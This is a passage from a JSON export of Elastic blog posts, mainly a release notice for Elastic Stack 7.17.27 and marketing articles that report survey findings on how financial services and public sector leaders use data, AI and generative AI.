\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003ca href=\"https://jobs.elastic.co/jobs/department/engineering?\u0026utm_source=http://elastic.co/\u0026utm_medium=referral\u0026utm_campaign=eb-wit\u0026utm_content=almudena-blog\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eCheck out open roles\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cem\u003e\u003cstrong\u003e.\u0026nbsp;\u003cbr /\u003e\u003cbr /\u003e\u003c/strong\u003e\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='color:rgb(52, 55, 65);font-size: 8pt;'\u003e\u003cem\u003eElastic, Elasticsearch and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csa9f4463fda612849"}}}],"publish_date":"2025-01-10","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","noindex":false,"canonical_tag":"","seo_image":null},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[{"uid":"bltb45e90791ca95e3b","_content_type_uid":"tags_culture"}],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt86490f3c4998e0e8","_version":1,"is_dir":false,"ACL":{},"content_type":"image/png","created_at":"2025-01-10T05:49:34.017Z","created_by":"blte369ea3bcd6ac892","file_size":"54671","filename":"170360-wit-almudenasanzolive_LinkedIn-Banner_720x420_Dark-1.png","parent_uid":null,"tags":[],"title":"170360-wit-almudenasanzolive_LinkedIn-Banner_720x420_Dark-1.png","updated_at":"2025-01-10T05:49:34.017Z","updated_by":"blte369ea3bcd6ac892","publish_details":{"time":"2025-01-10T15:00:00.346Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt86490f3c4998e0e8/6780b4ee532fd6be605a169d/170360-wit-almudenasanzolive_LinkedIn-Banner_720x420_Dark-1.png"},"title":"Almudena Sanz Olivé’s advice for women in tech? Find what motivates you","title_l10n":"Almudena Sanz Olivé’s advice for women in tech? Find what motivates you","updated_at":"2025-01-16T01:50:36.120Z","updated_by":"blte369ea3bcd6ac892","url":"/blog/culture-advice-for-women-in-tech","publish_details":{"time":"2025-01-16T01:51:58.107Z","user":"blte369ea3bcd6ac892","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt081b198b853d2a47","_version":2,"locale":"en-us","ACL":{},"abstract_l10n":"Read about the updates and bug fixes that have been included in this release.","author":["bltf544c5b3b4e14aa0"],"category":["bltfaae4466058cc7d6"],"created_at":"2025-01-14T17:17:25.897Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"Version 7.17.27 of the Elastic Stack was released today. We recommend you [upgrade to this latest version](https://www.elastic.co/downloads). We recommend 7.17.27 over the previous versions of 7.17.\n\nFor details of the issues that have been fixed and a full list of changes for each product in this version, please refer to [the release notes](https://www.elastic.co/guide/en/starting-with-the-elasticsearch-platform-and-its-solutions/7.17/new.html).","modular_blocks":[],"publish_date":"2025-01-14","sanity_migration_complete":false,"seo":{"seo_title_l10n":"","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[],"tags_partner":[],"tags_topic":[],"tags_use_case":[],"thumbnail_image":{"uid":"blt8836a5dda86cbfe0","_version":1,"created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2024-04-01T15:42:09.734Z","updated_at":"2024-04-01T15:42:09.734Z","content_type":"image/png","file_size":"62454","filename":"Patch_release_dark.png","title":"Patch_release_dark.png","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2024-04-02T17:14:25.081Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt8836a5dda86cbfe0/660ad5d11b5a5878c8adccbc/Patch_release_dark.png"},"title":"Elastic Stack 7.17.27 released","title_l10n":"Elastic Stack 7.17.27 released","updated_at":"2025-01-14T19:52:10.413Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/elastic-stack-7-17-27-released","publish_details":{"time":"2025-01-14T19:52:15.314Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"blt75e75d9afe1a4bef","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"The secret to solving business challenges in financial services? Data-fueled AI. We interviewed and surveyed 158 financial services IT leaders to discover what it takes to drive an intelligent AI strategy. ","author":["bltce462b8f0bc7868a"],"category":["bltc17514bfdbc519df"],"created_at":"2025-01-08T15:35:30.865Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs559eae5502fa38f6"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe financial services industry (FSI) has faced \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003emounting challenges in recent years \u003c/span\u003e\u003cspan style=\"font-size: 12pt;\"\u003efrom navigating the rapid acceleration of digital transformation during the COVID-19 pandemic to managing the fallout of economic downturns. These pressures have forced leaders to rethink traditional approaches and find ways to do more with less. A common strategy is the consolidation of tools and investment in technology designed to foster agility and data-driven decision-making. However, despite these efforts, over \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003e\u003cstrong\u003e70% of leaders still struggle to use data in real time and at scale\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eAs AI and generative AI (GenAI) continue to evolve, they offer new opportunities to unlock the value of data — provided organizations can establish robust data foundations. So, how are today’s financial services leaders rising to these challenges and using next-generation AI to drive their data maturity?\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eWe surveyed 1,005 C-suite, business, and technology leaders on the current state of their business with data and results specifically from 158 financial services leaders. The research reveals five key insights about their business challenges, underlying data problems, and investment priorities (AI, GenAI, and automation) as they catapult their organizations to the next level in the next 12 months and beyond.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eHere are \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003efive lessons\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e from financial services leaders on how to solve business challenges with data and AI.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 1: Accelerate business innovation by prioritizing data","_metadata":{"uid":"csfa6ea9977b502827"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003e“Data is the new currency” refers to the opportunity banks have to use customer data beyond traditional transactions to enhance services and customer engagement. Financial services companies maintain a lot of data, and much of it languishes in disparate legacy systems that go unleveraged. We know that a data-driven approach is also crucial for solving key business challenges and driving innovation — you can’t solve business challenges without the data needed for informed decision-making.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eToday, many C-suite and IT leaders share similar challenges. Chief among them is the inability to harness data continuously in real time and at scale. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style=\"font-size: 12pt;\"\u003eResearch reveals\u003c/span\u003e\u003c/a\u003e\u003cspan style=\"font-size: 12pt;\"\u003e that 70% of financial services executives identify this as a key hurdle driving their business challenges. Unsurprisingly, 61% have made investing in data tools and technology a top priority in overcoming these issues.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 2: There’s little satisfaction with data insights","_metadata":{"uid":"cs98581cb11cbc1672"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo lead effectively in an increasingly digital world, you must provide technology that delivers the right information to the right people at the right time. Yet, with data spread across diverse environments, formats, and locations, extracting actionable insights is a major challenge. In the financial services sector, 63% of executives are dissatisfied with the insights they have, while 98% face significant data management hurdles. These challenges limit real-time decision-making — increasing reliance on intuition — and lead to costly consequences like revenue loss, reduced productivity, and higher operational risks.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eIn response, leaders are prioritizing investments in data tools with 69% focusing on data analytics and science solutions to improve insights. However, fragmented systems aren’t enough; building a unified, agile data foundation is essential. By investing in scalable infrastructure, you can empower teams with real-time insights to address challenges, enhance customer experiences, and drive growth.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs7af682a5b9e09509"}}},{"quotes":{"quote_l10n":"We are a large bank, and we have hundreds of apps all using the same data but copies of the data. We need a large scale data repository geared up to allow all apps to access the data store in real time.","_metadata":{"uid":"csdeb03b0fe7a59c8d"},"quote_author_l10n":"Financial services industry leader","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Lesson 3: Organizations are less (data) mature than they think","_metadata":{"uid":"csbe5be1ca8c7d26c1"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eIn financial services, \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e77% of C-suite leaders and decision-makers believe that their organization is more advanced in data analytics and intelligence than their peers’\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e.\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e This heightened self-confidence can happen when leaders overestimate their progress in their data maturity journey.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eDiscrepancies between self-perceived versus actual data maturity:\u003c/strong\u003e\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e69%\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e of FSI leaders who believe that they were at level 3 or level 4 data maturity have not completed all of the level 1 milestones.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e61%\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e of FSI leaders who believe they are at level 4 maturity have only completed about half of the level 2 milestones.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e66%\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e of FSI leaders who believe they are at level 4 maturity have not completed all level 3 milestones.\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eA data maturity framework offers an objective way to assess your organization’s current capabilities, identify weaknesses, and create a roadmap for aligning data strategies with business goals. Advancing through each level of data maturity is essential, as foundational milestones enable the adoption of advanced technologies like AI and GenAI. Without a robust data foundation, poor data quality can lead to flawed insights and hinder innovation.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs6103d2e08b3f7683"}}},{"quotes":{"quote_l10n":"To address problems with data utilization, companies can implement a data governance framework that establishes clear guidelines, policies, and procedures for data collection, storage, and usage to ensure data quality, security, and compliance with regulations.","_metadata":{"uid":"csbee51eec552549b0"},"quote_author_l10n":"Financial services technology decision-maker","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"Lesson 4: Together, data and AI will increase revenue (and that’s not all!)","_metadata":{"uid":"cs1f85b4e8913f3e6c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eInvesting in data technology and AI has become a game-changer for businesses, offering more than just operational improvements. While automating tasks and streamlining workflows enhances productivity and reduces costs, the true potential lies in creating new revenue streams. \u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\" target=\"_self\"\u003eOver 75% of financial services leaders agree\u003c/a\u003e that using real-time data ingestion and AI-driven insights can significantly boost revenue, underscoring the critical role of these technologies for business. This consensus highlights the critical importance of data and AI in contributing to the bottom line.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style=\"font-size: 12pt;\"\u003eThe benefits extend beyond efficiency. FSI leaders highlight improved employee and customer experiences as top outcomes from data and AI investments. By combining robust infrastructure with advanced analytics, organizations can empower teams to make informed decisions, uncover new opportunities, and deliver exceptional experiences. Embracing AI as a core capability not only addresses current challenges but also positions your business for sustainable growth and long-term leadership in the industry.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Lesson 5: Organizations have already deployed generative AI. Have you?","_metadata":{"uid":"cs57beadb78052b0c5"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGenerative AI is reshaping industries, revolutionizing problem-solving and innovation. Nearly half of financial services leaders view it as key to addressing challenges with 91% investing or planning to invest. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/financial-services#the-power-of-generative-ai-for-financial-services\"\u003e\u003cspan style='font-size: 12pt;'\u003eUse cases\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e in financial services like chat bots, transaction analyzers, and security improvements deliver immediate value. So it’s not surprising that \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e91% of FSI C-suite executives and decision-makers plan to invest in or have already invested in generative AI\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e. And those who have yet to invest are waiting for generative AI to mature.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8bc75c1b1eabef5e"}}},{"quotes":{"quote_l10n":"It’s simply the way the market is progressing. Not investing [in AI] would leave us behind.","_metadata":{"uid":"cs7fd3348cb39101ca"},"quote_author_l10n":"Business decision-maker in the financial services industry","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs1f2ca3a602131c5e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTo remain competitive, financial services leaders are integrating AI, automation, and analytics into a cohesive strategy. This approach enhances decision-making, streamlines operations, and drives innovation. \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style='font-size: 12pt;'\u003eWith almost 90% of leaders prioritizing these technologies\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e, adopting generative AI is essential for sustainable growth and success.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInformed adoption of GenAI can position you ahead of competitors by creating new opportunities and driving innovation.\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e \u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003eTo stay ahead of the adoption curve, you must first have good data ready to go. Then, identify a high-impact use case that can benefit from the value of a \u003c/span\u003e\u003ca href=\"https://www.elastic.co/blog/open-source-llms-guide\"\u003e\u003cspan style='font-size: 12pt;'\u003elarge language model (LLM)\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eGetting the best results securely requires feeding your proprietary data to a GenAI algorithm using \u003c/span\u003e\u003ca href=\"https://www.elastic.co/what-is/retrieval-augmented-generation\"\u003e\u003cspan style='font-size: 12pt;'\u003eretrieval augmented generation (RAG\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e). This technique contextualizes the output of your organization, resulting in more accurate and relevant results.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Key takeaways from financial services IT leaders","_metadata":{"uid":"csd6d1a24bd8a24553"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe AI revolution is reshaping industries, and financial services leaders are beginning to harness its transformative potential. From accelerating innovation to driving revenue growth, AI and generative AI offer unparalleled opportunities for competitive advantage. However, many organizations struggle to fully capitalize on these technologies — with \u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style='font-size: 12pt;'\u003e70% of FSI leaders citing difficulties in utilizing data continuously in real time and at scale.\u003c/span\u003e\u003c/a\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThis challenge highlights the need for a fundamental shift in how financial services organizations approach data. By combining the precision of search with the intelligence of AI, you can gain instant, accurate, and actionable insights — empowering confident, data-driven decisions.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eNow is the time to embrace the power of data and AI to overcome challenges, unlock new opportunities, and lead your organization into the future.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/resources/report/solving-business-challenges-with-data-and-ai-fsi\"\u003e\u003cspan style='font-size: 12pt;'\u003eLearn more about what financial services IT leaders had to say about their data and AI strategies\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csbf887fc9f63ffa10"}}},{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"cs10e4314d050fa67e"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eThe release and timing of any features or functionality described in this post remain at Elastic's sole discretion. Any features or functionality not currently available may not be delivered on time or at all.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eIn this blog post, we may have used or referred to third party generative AI tools, which are owned and operated by their respective owners. Elastic does not have any control over the third party tools and we have no responsibility or liability for their content, operation or use, nor for any loss or damage that may arise from your use of such tools. Please exercise caution when using AI tools with personal, sensitive or confidential information. Any data you submit may be used for AI training or other purposes. There is no guarantee that information you provide will be kept secure or confidential. You should familiarize yourself with the privacy practices and terms of use of any generative AI tools prior to use.\u0026nbsp;\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 10pt;'\u003e\u003cem\u003eElastic, Elasticsearch, ESRE, Elasticsearch Relevance Engine and associated marks are trademarks, logos or registered trademarks of Elasticsearch N.V. in the United States and other countries. All other company and product names are trademarks, logos or registered trademarks of their respective owners.\u003c/em\u003e\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"csae80e895bec79c2b"}}}],"publish_date":"2025-01-08","sanity_migration_complete":false,"seo":{"seo_title_l10n":"How banks can use existing data with AI to solve business challenges","seo_description_l10n":"","seo_image":null,"noindex":false,"canonical_tag":""},"subtitle_l10n":"","table_of_contents":{"blog_series":[]},"tags":[],"tags_culture":[],"tags_elastic_stack":[],"tags_industry":[{"_version":2,"locale":"en-us","uid":"blt7898c57653ca2b6e","ACL":{},"created_at":"2020-06-17T03:23:20.767Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"financial-services","label_l10n":"Financial services","tags":[],"title":"Financial services","updated_at":"2020-07-06T22:17:46.176Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:17.532Z","user":"blt4b2e1169881270a8"}}],"tags_partner":[],"tags_topic":[{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt284682f193d93481","ACL":{},"created_at":"2023-11-06T20:07:36.694Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-ml-models","label_l10n":"AI/ML models","tags":[],"title":"AI/ML models","updated_at":"2023-11-06T20:07:36.694Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:37.071Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltbaad5df00a89fcb2","ACL":{},"created_at":"2023-11-06T20:07:17.254Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"ai-search-applications","label_l10n":"AI search applications","tags":[],"title":"AI search applications","updated_at":"2023-11-06T20:07:17.254Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:41:43.822Z","user":"blt06083bb707628f5c"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"bltc76ab818663a30de","ACL":{},"created_at":"2023-11-06T21:31:31.473Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-compliance","label_l10n":"Security \u0026 compliance","tags":[],"title":"Security \u0026 compliance","updated_at":"2023-11-06T21:31:31.473Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.295Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt43ad419de732b584","ACL":{},"created_at":"2023-11-06T21:31:46.367Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"security-analytics","label_l10n":"Security analytics","tags":[],"title":"Security analytics","updated_at":"2023-11-06T21:31:46.367Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T16:28:54.534Z","user":"blt4b2e1169881270a8"}},{"_content_type_uid":"tags_topic","_version":1,"locale":"en-us","uid":"blt99b075caf3df4ca7","ACL":{},"created_at":"2023-11-06T21:41:39.171Z","created_by":"blt3044324473ef223b70bc674c","hidden_value":false,"keyword":"generative-ai","label_l10n":"Generative AI","tags":[],"title":"Generative AI","updated_at":"2023-11-06T21:41:39.171Z","updated_by":"blt3044324473ef223b70bc674c","publish_details":{"environment":"blt835e2c3b7e9eb7fb","locale":"en-us","time":"2023-12-08T15:50:18.390Z","user":"blt4b2e1169881270a8"}}],"tags_use_case":[],"thumbnail_image":{"uid":"blt4691d606956f3926","_version":1,"title":"D4-03_V1 (1).jpg","created_by":"bltb6c155cd84fc0c1a","updated_by":"bltb6c155cd84fc0c1a","created_at":"2025-01-07T14:25:27.594Z","updated_at":"2025-01-07T14:25:27.594Z","content_type":"image/jpeg","file_size":"143204","filename":"D4-03_V1_(1).jpg","ACL":{},"parent_uid":null,"is_dir":false,"tags":[],"publish_details":{"time":"2025-01-08T15:39:30.093Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"},"url":"https://images.contentstack.io/v3/assets/bltefdd0b53724fa2ce/blt4691d606956f3926/677d395734b6b68cfebb3e78/D4-03_V1_(1).jpg"},"title":"Transform financial services with AI: Unlock growth, innovation, and insights","title_l10n":"Transform financial services with AI: Unlock growth, innovation, and insights","updated_at":"2025-01-08T15:38:29.813Z","updated_by":"bltb6c155cd84fc0c1a","url":"/blog/how-banks-use-existing-data-ai-business-challenges","publish_details":{"time":"2025-01-08T15:39:29.568Z","user":"bltb6c155cd84fc0c1a","environment":"blt835e2c3b7e9eb7fb","locale":"en-us"}},{"uid":"bltd517d60d08c56c0e","_version":3,"locale":"en-us","ACL":{},"abstract_l10n":"How will AI and generative AI shape the future of data in the public sector? See the five key insights garnered from nearly 200 public sector leaders about their underlying data problems, operational challenges, and technology investment priorities.","author":["blt6d82d216763f3c7c"],"category":["blt0c9f31df4f2a7a2b"],"created_at":"2024-12-18T15:14:30.532Z","created_by":"bltb6c155cd84fc0c1a","markdown_l10n":"","modular_blocks":[{"title_text":{"title_text":[{"title_l10n":"","_metadata":{"uid":"csf2d6559636a900fb"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDespite the best intentions of many public sector leaders to build data-driven organizations, the reality is that \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e65% of public sector leaders still struggle to use data continuously\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e in real time and at scale. The upside? Many leaders are taking advantage of \u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/public-sector/ai\"\u003e\u003cspan style='font-size: 12pt;'\u003eAI and generative AI\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e to tackle this critical need. But to reach that level of advanced data maturity and harness the power of these technologies, public sector teams need to manage and analyze exponentially growing data volumes — all while dealing with complex mission challenges.\u0026nbsp;\u0026nbsp;\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eWe partnered with Socratic Technologies to dig deeper into the state of data in the public sector — the data behind the data, if you will. Over 1,000 C-suite, business, and technology leaders from around the world were surveyed on the current state of their organizations. \u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003eWith data and results from nearly 200 leaders in the \u003c/strong\u003e\u003c/span\u003e\u003ca href=\"https://www.elastic.co/industries/public-sector\"\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003epublic sector\u003c/strong\u003e\u003c/span\u003e\u003c/a\u003e\u003cspan style='font-size: 12pt;'\u003e,\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e\u003cstrong\u003e the research reveals five key insights about their operational challenges, underlying data problems, and investment priorities (AI, GenAI, and automation).\u003c/strong\u003e\u003c/span\u003e\u003cspan style='font-size: 12pt;'\u003e Here’s a sneak peek at the results.\u003c/span\u003e\u003c/p\u003e"},{"title_l10n":"Extracting maximum value from data is a priority . . .","_metadata":{"uid":"csc18656f0c8810714"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eOrganizations everywhere want to center their decision-making around data. But that’s easier said than done. Leaders cited that the lack of adequate tools and automation\u0026nbsp; made it difficult to gather informed insights from their wealth of data.\u003c/span\u003e\u003c/p\u003e\u003cp\u003e\u003c/p\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBased on these widely cited data-wrangling difficulties, it’s easy to see how AI and generative AI will play a key role going forward.\u003c/span\u003e\u003c/p\u003e"}],"_metadata":{"uid":"cs8dfeed8b8388c012"}}},{"quotes":{"quote_l10n":"It’s taking us longer to do our job, which is not good since most of our work is done in an emergency situation. We need to be able to get information as soon as possible.","_metadata":{"uid":"cs2da38c6dd4ef0013"},"quote_author_l10n":"Nontechnical decision-maker, public sector","quote_details_l10n":""}},{"title_text":{"title_text":[{"title_l10n":". . . but there’s little satisfaction with data insights","_metadata":{"uid":"csa40408577f4eb50c"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eBased on the research, only 32% of public sector leaders use data insights for daily decisions. So, even when most organizations have no shortage of data, they continue to struggle with drawing strategic insights from it. Some challenges include:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTeams struggling to adopt data tools and products\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eInability to monitor data and use insights in real time\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eDifficulty with efficient use of AI to analyze data\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eTough to analyze data at scale\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eData silos and sprawl\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003c/ul\u003e"},{"title_l10n":"Organizations aren’t quite as (data) mature as they think","_metadata":{"uid":"cs91eeb29be2cc5be3"},"header_style":"H2","paragraph_l10n":"\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eThe report analyzes organizations’ data maturity frameworks using the following levels to assess how far along they are in their strategic data journey:\u003c/span\u003e\u003c/p\u003e\u003cul\u003e\u003cli\u003e\u003cp\u003e\u003cspan style='font-size: 12pt;'\u003eLevel 1: Consume and capture\u003c/span\u003e\u003c/p\u003e\u003c/li\u003e\u003cli\u003e\u003cp\u003e\u003cspan 